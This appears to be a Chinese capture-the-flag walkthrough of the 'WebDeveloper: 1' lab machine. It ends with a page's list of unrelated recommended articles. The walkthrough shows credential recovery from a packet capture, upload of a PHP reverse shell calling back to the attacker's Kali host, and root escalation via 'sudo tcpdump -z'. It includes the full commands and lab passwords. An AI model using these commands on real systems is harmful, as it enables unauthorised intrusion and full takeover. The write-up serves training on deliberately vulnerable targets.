WebDeveloper:1靶机

端口扫描

靶机ip地址为192.168.153.158

目录扫描

访问80端口

拼接访问 /ipdata 发现了一个流量包

放在 wireshark 查看,找到 账号密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接 /wp-login.php

找到登录框

登录成功

找到后台文件上传功能点

利用kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip地址改成kali的ip

上传文件

上传的文件在wp-content/uploads/目录下

kali监听

反弹成功

获得交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/var/www/html/目录下 ,查看 wp-config.php 文件

得到数据库账号密码

账号:webdeveloper

密码:MasterOfTheUniverse

ssh连接 ssh webdeveloper@192.168.153.158

连接成功

sudo提权 sudo -l

找到 php-reverse-shell.php文件位置

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

反弹成功

为root权限

相关推荐
阿里云云原生1 小时前
山石网科×阿里云通义灵码,开启研发“AI智造”新时代
网络·人工智能·阿里云·ai程序员·ai程序员体验官
xvch1 小时前
Kotlin 2.1.0 入门教程(二十五)类型擦除
android·kotlin
小冷爱学习!7 小时前
华为动态路由-OSPF-完全末梢区域
服务器·网络·华为
技术小齐8 小时前
网络运维学习笔记 016网工初级(HCIA-Datacom与CCNA-EI)PPP点对点协议和PPPoE以太网上的点对点协议(此处只讲华为)
运维·网络·学习
simplepeng9 小时前
我的天,我真是和androidx的字体加载杠上了
android
shimly12345610 小时前
tcpdump 用法示例
网络·测试工具·tcpdump
小猫猫猫◍˃ᵕ˂◍11 小时前
备忘录模式:快速恢复原始数据
android·java·备忘录模式
xmweisi11 小时前
【华为】报文统计的技术NetStream
运维·服务器·网络·华为认证
VVVVWeiYee12 小时前
BGP配置华为——路径优选验证
运维·网络·华为·信息与通信
yourkin66612 小时前
TCP...
服务器·网络·tcp/ip